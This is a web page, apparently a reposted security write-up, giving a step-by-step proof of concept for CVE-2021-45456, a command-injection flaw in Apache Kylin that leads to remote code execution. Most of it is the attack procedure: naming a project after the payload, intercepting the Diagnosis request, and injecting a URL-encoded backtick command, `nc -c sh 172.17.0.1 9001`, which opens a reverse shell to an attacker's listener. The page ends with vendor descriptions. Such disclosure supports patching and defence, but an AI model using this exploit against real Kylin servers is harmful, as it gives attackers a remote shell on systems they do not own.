Skip to content

CVE-2021-45456: Apache Kylin RCE PoC

Introduction

Command injection in #Apache Kylin has been found and registered as #CVE-2021-45456, in vsociety we managed to leverage it to RCE and create PoC.

Analysis for this CVE is coming soon, so stay tuned to understand more in-depth about how this vulnerability works.

Proof of concept

  • Add a project

  • No characters are allowed except _ , therefore the name of the project is based on the payload but stripped from characters as follows:


    my payload is nc -c sh 172.17.0.1 9001 so the project name is nccsh17217019001




  • Go to “System”

  • Turn proxy on

  • Click “Diagnosis” and intercept the request


  • Send it to the repeater and drop this request

  • The payload after encoding %60nc%20%2dc%20sh%20172%2e17%2e0%2e1%209001%60


    The decoded payload

    `nc -c sh 172.17.0.1 9001`


  • Replace the project name with the encoded payload


  • Run the listener and send the request



NOTES

  1. Adding any / encoded or not in the payload will not work. Check the analysis on vsociety for more information.

  2. You need permission to create a project, so the name of the project can be based on the payload.

  3. The exploitation will not succeed if the project name is modified by adding any additional letter to the payload in the request.

  4. The ip and port should be part of the name, the IP without . and you add the dots . later as URL encoded.

About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

×

Hello!

Click one of our contacts below to chat on WhatsApp

Social Chat is free, download and try it now here!

×